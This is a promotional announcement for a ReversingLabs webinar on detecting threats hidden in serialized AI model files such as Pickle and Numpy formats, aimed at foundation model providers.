
Wednesday, March 18 @ 1-2pm ET
Building Trustworthy AI
Detecting Hidden Threats in AI Models Before They Strike
The models you build and distribute are the new frontier for sophisticated, hard-to-detect attacks.
As a foundation model provider, securing your core artifacts and the platforms that host them is a non-negotiable responsibility. The foundation of your AI stack is a potent vector for attack, with threats often hidden within serialized model formats like Pickle or Numpy files.
Join ReversingLabs to learn how to detect and neutralize these threats before they ever reach your customers.
In this webinar, we will explore:
Attendees will receive an attendance certificate to be used towards CPE credit.
Meet the Speakers